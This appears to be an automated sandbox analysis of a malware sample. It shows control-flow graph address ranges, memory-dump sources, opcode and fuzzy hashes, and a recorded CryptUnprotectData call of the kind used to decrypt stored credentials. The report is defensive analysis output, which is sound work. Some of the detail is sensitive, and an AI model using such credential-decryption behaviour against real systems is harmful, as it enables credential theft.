                                                                                                            control_flow_graph 1246 37b1bdf0-37b1be10 1247 37b1be12 1246->1247 1248 37b1be17-37b1be77 1246->1248 1247->1248 1250 37b1c1aa-37b1c1d2 1248->1250 1251 37b1be7d-37b1bf8e 1248->1251 1254 37b1c959-37b1c981 1250->1254 1255 37b1c1d8-37b1c1ff 1250->1255 1293 37b1bf90-37b1bf9c 1251->1293 1294 37b1bfb8 1251->1294 1262 37b1cc10 1254->1262 1263 37b1c987-37b1cb3f 1254->1263 1260 37b1c205-37b1c40a 1255->1260 1261 37b1c4fe-37b1c86a 1255->1261 1362 37b1c423-37b1c434 1260->1362 1363 37b1c40c-37b1c421 1260->1363 1406 37b1c883-37b1c894 1261->1406 1407 37b1c86c-37b1c881 1261->1407 1264 37b1cc11-37b1cc17 1262->1264 1356 37b1cb49-37b1cb62 1263->1356 1295 37b1bfa6-37b1bfac 1293->1295 1296 37b1bf9e-37b1bfa4 1293->1296 1298 37b1bfbe-37b1c160 1294->1298 1301 37b1bfb6 1295->1301 1296->1301 1375 37b1c162-37b1c16e 1298->1375 1376 37b1c16f 1298->1376 1301->1298 1420 37b1cb68 call 15324d 1356->1420 1421 37b1cb68 call 153168 1356->1421 1370 37b1c435-37b1c4f9 1362->1370 1363->1370 1365 37b1cb6d-37b1cbb7 1384 37b1cbc2-37b1cbdd call 37b1cc28 1365->1384 1399 37b1c958 1370->1399 1375->1376 1376->1250 1387 37b1cbe3-37b1cbe5 1384->1387 1387->1264 1399->1254 1410 37b1c895-37b1c957 1406->1410 1407->1410 1410->1399 1420->1365 1421->1365
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4
                                                                                                            • API String ID: 0-967804232
                                                                                                            • Opcode ID: 9be8014ce6a8361a55593a57cbc014b0f5746184240115cd5d8610af5b12141e
                                                                                                            • Instruction ID: 59b5811c84d21b9659de3c80def7df0efb5d2934ed5cd09a70d7d42666a33cad
                                                                                                            • Opcode Fuzzy Hash: 9be8014ce6a8361a55593a57cbc014b0f5746184240115cd5d8610af5b12141e
                                                                                                            • Instruction Fuzzy Hash: 8272C374A01268CFDB25DFA4D894BA9B7B2FB89301F5081E9D909B7360CB319E81DF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1423 3818d6e8-3818d74b 1424 3818d77a-3818d798 1423->1424 1425 3818d74d-3818d777 1423->1425 1430 3818d79a-3818d79c 1424->1430 1431 3818d7a1-3818d7d8 1424->1431 1425->1424 1432 3818dc5a-3818dc6f 1430->1432 1435 3818dc09 1431->1435 1436 3818d7de-3818d7f2 1431->1436 1439 3818dc0e-3818dc24 1435->1439 1437 3818d821-3818d840 1436->1437 1438 3818d7f4-3818d81e 1436->1438 1445 3818d858-3818d85a 1437->1445 1446 3818d842-3818d848 1437->1446 1438->1437 1439->1432 1449 3818d879-3818d882 1445->1449 1450 3818d85c-3818d874 1445->1450 1447 3818d84a 1446->1447 1448 3818d84c-3818d84e 1446->1448 1447->1445 1448->1445 1452 3818d88a-3818d891 1449->1452 1450->1439 1453 3818d89b-3818d8a2 1452->1453 1454 3818d893-3818d899 1452->1454 1456 3818d8ac 1453->1456 1457 3818d8a4-3818d8aa 1453->1457 1455 3818d8af-3818d8cc call 3818c678 1454->1455 1460 3818da21-3818da25 1455->1460 1461 3818d8d2-3818d8d9 1455->1461 1456->1455 1457->1455 1463 3818da2b-3818da2f 1460->1463 1464 3818dbf4-3818dc07 1460->1464 1461->1435 1462 3818d8df-3818d91c 1461->1462 1472 3818dbea-3818dbee 1462->1472 1473 3818d922-3818d927 1462->1473 1465 3818da49-3818da52 1463->1465 1466 3818da31-3818da44 1463->1466 1464->1439 1468 3818da81-3818da88 1465->1468 1469 3818da54-3818da7e 1465->1469 1466->1439 1470 3818da8e-3818da95 1468->1470 1471 3818db27-3818db3c 1468->1471 1469->1468 1474 3818dac4-3818dae6 1470->1474 1475 3818da97-3818dac1 1470->1475 1471->1472 1482 3818db42-3818db44 1471->1482 1472->1452 1472->1464 1476 3818d959-3818d96e call 3818c69c 1473->1476 1477 3818d929-3818d937 call 3818c684 1473->1477 1474->1471 1511 3818dae8-3818daf2 1474->1511 1475->1474 1486 3818d973-3818d977 1476->1486 1477->1476 1490 3818d939-3818d957 call 3818c690 1477->1490 1488 3818db91-3818dbae call 3818c678 1482->1488 1489 3818db46-3818db7f 1482->1489 1491 3818d9e8-3818d9f5 1486->1491 1492 3818d979-3818d98b call 38180938 call 3818c6a8 1486->1492 1488->1472 1509 3818dbb0-3818dbdc WaitMessage 1488->1509 1506 3818db88-3818db8f 1489->1506 1507 3818db81-3818db87 1489->1507 1490->1486 1491->1472 1510 3818d9fb-3818da05 call 3818c6b8 1491->1510 1516 3818d9cb-3818d9e3 1492->1516 1517 3818d98d-3818d9bd 1492->1517 1506->1472 1507->1506 1513 3818dbde 1509->1513 1514 3818dbe3 1509->1514 1520 3818da14-3818da1c call 3818c6d0 1510->1520 1521 3818da07-3818da0a call 3818c6c4 1510->1521 1525 3818db0a-3818db25 1511->1525 1526 3818daf4-3818dafa 1511->1526 1513->1514 1514->1472 1516->1439 1532 3818d9bf 1517->1532 1533 3818d9c4 1517->1533 1520->1472 1528 3818da0f 1521->1528 1525->1471 1525->1511 1530 3818dafc 1526->1530 1531 3818dafe-3818db00 1526->1531 1528->1472 1530->1525 1531->1525 1532->1533 1533->1516
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: 1b619f228ba82f91e0055cc0af9f3a316818ae61ffdf42567f8f0dc3616601a1
                                                                                                            • Instruction ID: 19653d8cb3432f784be8b038dc40488045f850d2c85c50c16939471e4cc8a7b3
                                                                                                            • Opcode Fuzzy Hash: 1b619f228ba82f91e0055cc0af9f3a316818ae61ffdf42567f8f0dc3616601a1
                                                                                                            • Instruction Fuzzy Hash: 13F16A75A00309CFEB04DFA9C845B9DBBF2BF89304F158569E409AB2A5DB70E945CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1595 37a6d9d9-37a6d9df 1596 37a6d9e0-37a6da52 CryptUnprotectData 1595->1596 1597 37a6da54-37a6da5a 1596->1597 1598 37a6da5b-37a6da83 1596->1598 1597->1598
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000B0,?,00000000,?,?,?,?), ref: 37A6DA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 122a99f1f44698a447befa8095424cbf1bd207e3a8b4833413d3506868f5c54e
                                                                                                            • Instruction ID: 3d9d449a97c08a4ce064fb99ab21911e9ed8b20fc3679d76e43aa2844632965d
                                                                                                            • Opcode Fuzzy Hash: 122a99f1f44698a447befa8095424cbf1bd207e3a8b4833413d3506868f5c54e
                                                                                                            • Instruction Fuzzy Hash: D81167B6800249EFDB10CF9AC804BDEBFF5EF48320F148419EA18A7211C339A950CFA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1601 37a6d1ec-37a6da52 CryptUnprotectData 1603 37a6da54-37a6da5a 1601->1603 1604 37a6da5b-37a6da83 1601->1604 1603->1604
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000B0,?,00000000,?,?,?,?), ref: 37A6DA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: f5f66c0fe427bedb3eace3843cd1af628e0496fe429da6c32636c4f3efb013ec
                                                                                                            • Instruction ID: 49c261bf8b39e34f585aec35276db80ca991d01b0cd260d3b094a9d69f773e80
                                                                                                            • Opcode Fuzzy Hash: f5f66c0fe427bedb3eace3843cd1af628e0496fe429da6c32636c4f3efb013ec
                                                                                                            • Instruction Fuzzy Hash: F81147B2800249EFDB10CF9AC805BEEBBF4EF48360F148419E918B7251C339A950CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 495739a6b3eee6365fcce65e17779ff6d56ef30fd464edcaa02bc51af40a07c8
                                                                                                            • Instruction ID: 1a5479e293f5478c2084f0f95ee0d6620600ce4209d11e729b667b05e69536c5
                                                                                                            • Opcode Fuzzy Hash: 495739a6b3eee6365fcce65e17779ff6d56ef30fd464edcaa02bc51af40a07c8
                                                                                                            • Instruction Fuzzy Hash: 14A27F70A04209DFCB15CF68C994AAEBBB2FF88301F158559E815DF261D730ED89CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7352f07c22f159ae0608d09b3c5887a77fac71276af937012608e9bdd176438a
                                                                                                            • Instruction ID: 32aec36f38e33263998e92cf1dc8345917fc7e2032ddd5fa7bed9b78e5364892
                                                                                                            • Opcode Fuzzy Hash: 7352f07c22f159ae0608d09b3c5887a77fac71276af937012608e9bdd176438a
                                                                                                            • Instruction Fuzzy Hash: AD72BF74E01268CFEB64DF69C884BDDBBB2BB49311F5481E9D409A7251DB34AE81CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 33ef05566b3f07d83138a88ef3b904597eaea3bff026dfe8805a6780a3032331
                                                                                                            • Instruction ID: d650a3b80acb386c24b082e859bacd99b3e871d3c5bff1b7b1afc5cf4e94b6c5
                                                                                                            • Opcode Fuzzy Hash: 33ef05566b3f07d83138a88ef3b904597eaea3bff026dfe8805a6780a3032331
                                                                                                            • Instruction Fuzzy Hash: F9128E71A00619CFDB14DFA9C854BAEBBB7BF88301F248529E815DB391DB349D85CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2ac931e044a2283597d1e3dcfa63963d9225d04a5e633a9905a24c184b14029d
                                                                                                            • Instruction ID: b75bd88b51450310e5b5a000c8a6e6263475ef1235d51efc803beb53554d7c51
                                                                                                            • Opcode Fuzzy Hash: 2ac931e044a2283597d1e3dcfa63963d9225d04a5e633a9905a24c184b14029d
                                                                                                            • Instruction Fuzzy Hash: D9124130A00219DFCB15CFA9C994AADBBF2FF88316F958059E815EB261D731DD85CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 49e66814bd58d47ddcf95c17dc72590234753f4e9a9715150b0b8a50570ab1e6
                                                                                                            • Instruction ID: de5e1d7d61ba1eb0ee96395255b9d2fc74cb064b156ddd8c83708238afddb8dc
                                                                                                            • Opcode Fuzzy Hash: 49e66814bd58d47ddcf95c17dc72590234753f4e9a9715150b0b8a50570ab1e6
                                                                                                            • Instruction Fuzzy Hash: EFE1E274E01218CFEB14CFA5D944B9DBBB2BF89304F2081AAD819BB391DB355A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d52563b66130955983ef4cb8b6675e349891dfb2a142d3225dfd4b61f10a4d1
                                                                                                            • Instruction ID: ba63457000b4abb8bdaf8b5b36a89c0967471378bf4c2bec8bf7b7f4ca3ad42f
                                                                                                            • Opcode Fuzzy Hash: 3d52563b66130955983ef4cb8b6675e349891dfb2a142d3225dfd4b61f10a4d1
                                                                                                            • Instruction Fuzzy Hash: D8D1D174E00218CFDB14DFA5D954BADBBB2BF88304F1081A9D819AB354DB355E86CF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7c7c159a3750b5794163ac489e44cea966d098afcb814cb89e3dc0e0f05a1497
                                                                                                            • Instruction ID: a6c794b383de99c49e5ba15a5bc1f3d55f4b5e83032aeead0a65b5a1181aebfd
                                                                                                            • Opcode Fuzzy Hash: 7c7c159a3750b5794163ac489e44cea966d098afcb814cb89e3dc0e0f05a1497
                                                                                                            • Instruction Fuzzy Hash: 6AC1D374E00218CFEB14DFA5D994B9DBBB2BF89304F2081A9D819AB354DB359E85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e6e21dcc5bbe4a0dae6f5862e6623d8a5359f662b77b3b9e92a5572e67502304
                                                                                                            • Instruction ID: 43be4a84dce75c0fbf97c511362c230d14c4e0f0f0c54c25c3fb15c2d0f0b529
                                                                                                            • Opcode Fuzzy Hash: e6e21dcc5bbe4a0dae6f5862e6623d8a5359f662b77b3b9e92a5572e67502304
                                                                                                            • Instruction Fuzzy Hash: 65A11570D00208CFEB14DFA9C948BDDBBB1BF89314F208269E518AB291DB749985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 04fa9ff21e4206d4d94c832bdc67ff67ddf9862bd3bfe6810bf16443d196f744
                                                                                                            • Instruction ID: 18d2d1988fc282d25536f7ec3c0c11206f49e56d076fc02aee704f2269f812f7
                                                                                                            • Opcode Fuzzy Hash: 04fa9ff21e4206d4d94c832bdc67ff67ddf9862bd3bfe6810bf16443d196f744
                                                                                                            • Instruction Fuzzy Hash: D0A11470E00208CFEB14DFA9C988BDDBBB1BF89315F208269E518B7291DB749985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f57f0209ea4724afb5eca07937a1df092f7d769cfe6e0e86b5331282925cc788
                                                                                                            • Instruction ID: d051aa65f7e0ee9f8daf099aa10928329bc49980d54123aa25410600cca57ac8
                                                                                                            • Opcode Fuzzy Hash: f57f0209ea4724afb5eca07937a1df092f7d769cfe6e0e86b5331282925cc788
                                                                                                            • Instruction Fuzzy Hash: 2DA1A2B5E01268CFEB18CF6AC944B9DBBF2AF89300F14C1AAD409B7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2784fdfa99f04000526ae5d0d425e2a7366991ccb52fd3663ea81407adc21e7c
                                                                                                            • Instruction ID: c86d18c620eb260f4070ef823ea85d5ff68e716b7a880c083d90ad69cfbbea34
                                                                                                            • Opcode Fuzzy Hash: 2784fdfa99f04000526ae5d0d425e2a7366991ccb52fd3663ea81407adc21e7c
                                                                                                            • Instruction Fuzzy Hash: 43A171B5E01228CFEB14CF6AC984B9DFBF2AB89310F14C1AAD408B7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 79e38d868ebf0236b1cb4633f6abd0cab5eb5c84f1fdc03d4660da1f2b756986
                                                                                                            • Instruction ID: 54e14656bfce967a404130dc0db46dc0d1eb849178f61fb243622125a1fad025
                                                                                                            • Opcode Fuzzy Hash: 79e38d868ebf0236b1cb4633f6abd0cab5eb5c84f1fdc03d4660da1f2b756986
                                                                                                            • Instruction Fuzzy Hash: 5AA182B5E01268CFEB24CF6AC944B9DBBF2AF89300F14C1AAD409B7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 493841e63f99ee9be633cf378a58e95ba4f4a788b583cae841b55ffda501dcf8
                                                                                                            • Instruction ID: ef2ba7cd4a2d4e014d942692fa97ee10731a49ed838b724b85837e7ce512b7cb
                                                                                                            • Opcode Fuzzy Hash: 493841e63f99ee9be633cf378a58e95ba4f4a788b583cae841b55ffda501dcf8
                                                                                                            • Instruction Fuzzy Hash: EFA173B5E01268CFEB14CF6AC984B9DBBF2AF89301F14C1AAD408B7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745686553.0000000037A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A60000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37a60000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 83b64473dde4af2c4e1fbedc6ed417c384b7639f0ee4b0139af6f2871acabbc9
                                                                                                            • Instruction ID: 4211163db46ac77ab5307210dafe20996784dfb941950754628b3a246670e0ca
                                                                                                            • Opcode Fuzzy Hash: 83b64473dde4af2c4e1fbedc6ed417c384b7639f0ee4b0139af6f2871acabbc9
                                                                                                            • Instruction Fuzzy Hash: 7A91F374900308CFEB10DFA8C988B9DBBB1FF89315F208269E519B7291DB749985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d314a614b2cbc5012343b0056ff5fc7b9094d054bae9ebbffb664ca69fbddfa
                                                                                                            • Instruction ID: 646c31c5b133989b086d7c2e8bc72d3bcee9d632bc0d150fad1505608a39b007
                                                                                                            • Opcode Fuzzy Hash: 0d314a614b2cbc5012343b0056ff5fc7b9094d054bae9ebbffb664ca69fbddfa
                                                                                                            • Instruction Fuzzy Hash: F191D674E00258CFEB18DFA9D884A9DBBF2BF89305F14C169D819AB365DB309985CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 085753c5e9e814a6c12e749673c2e91adac3d3b30bce2dc1caf35969320cb184
                                                                                                            • Instruction ID: b9e3dd01d7f10ba2b7965f6aa739b89be561cf1f6d6fc6aa4daa8e23237b7331
                                                                                                            • Opcode Fuzzy Hash: 085753c5e9e814a6c12e749673c2e91adac3d3b30bce2dc1caf35969320cb184
                                                                                                            • Instruction Fuzzy Hash: B981C674E00258CFEB18DFA9D94069EBBF2BF88311F248129E814BB358DB759942CF54
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 37e398df7dae223290c215b363ce28ef31c1b1e8a5eb5d6bb5d3a9256b792661
                                                                                                            • Instruction ID: d0f1e538d0d7b49dfdb0853c1bce05fa162d21d1c30355740ae6a441eb63a0c5
                                                                                                            • Opcode Fuzzy Hash: 37e398df7dae223290c215b363ce28ef31c1b1e8a5eb5d6bb5d3a9256b792661
                                                                                                            • Instruction Fuzzy Hash: 7481A5B4D00668CFEB18CF6AC944B9ABBF2AF89200F14C1AAD40CB7255DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: af4a3ac9b34d1c8c6474dc4d5e7c5fd941e31e5d247a74fa9c3c5f6c2efd6a66
                                                                                                            • Instruction ID: 3379fc07d325a3c0cc4a67fc24ade726b7de7a6784681a628a5895c6e3aeece8
                                                                                                            • Opcode Fuzzy Hash: af4a3ac9b34d1c8c6474dc4d5e7c5fd941e31e5d247a74fa9c3c5f6c2efd6a66
                                                                                                            • Instruction Fuzzy Hash: E171D175D01268CFEB64CF66D9847DDBBF2BF89310F1091AAD409A7260DB349A82CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1e93f5b338f42de7dfd59e8d5c1470dffedc26bd186ae1dabb1fdbd7b0142f9
                                                                                                            • Instruction ID: 48a6cde84818469d4766f716cc8d4209aff997e1e4b58bfd85cd0886f63675dd
                                                                                                            • Opcode Fuzzy Hash: e1e93f5b338f42de7dfd59e8d5c1470dffedc26bd186ae1dabb1fdbd7b0142f9
                                                                                                            • Instruction Fuzzy Hash: 097193B1E00668CFEB68CF66C944B9DBBF2AF89300F14C1AAD40DA7254DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 41ae47485e46747dec0a2ad085768239b63273b98502c3b4800b374dc7b04b31
                                                                                                            • Instruction ID: ff266f80439d917c73139d91bb90f5462d4d89232e98d0f34ba59f6e58d85f74
                                                                                                            • Opcode Fuzzy Hash: 41ae47485e46747dec0a2ad085768239b63273b98502c3b4800b374dc7b04b31
                                                                                                            • Instruction Fuzzy Hash: 9F61F734A00259CFEB25DFA4D854BADB7B2FB88304F1081A9990A77750DF315E82DF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e5a85f169c0a67e8bc923496f1ad91a47d90ab69b1d39f650bb22abb0a9ce20a
                                                                                                            • Instruction ID: 3acaa8f2e3e254d10e22eb405857ea3ae0f49ac430313a51b28e904346487fe3
                                                                                                            • Opcode Fuzzy Hash: e5a85f169c0a67e8bc923496f1ad91a47d90ab69b1d39f650bb22abb0a9ce20a
                                                                                                            • Instruction Fuzzy Hash: 2C417BB1D016588BEB58CF6BCD457C9FAF3AFC9300F14C1AAD40CA6265DB741A868F51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 116175b886435627d307ce7c3901f36444a9a61a6d3d1886f90c47cf15e2e014
                                                                                                            • Instruction ID: be4a4f22b8748297b19984ac6544566584c9bacb945af7be69bdf1d4936f4eff
                                                                                                            • Opcode Fuzzy Hash: 116175b886435627d307ce7c3901f36444a9a61a6d3d1886f90c47cf15e2e014
                                                                                                            • Instruction Fuzzy Hash: 104169B1D016188BEB58CF6BCD447CAFAF3AFC9310F14C1AAD50CA6254DB741A868F51
                                                                                                            Memory Dump Source
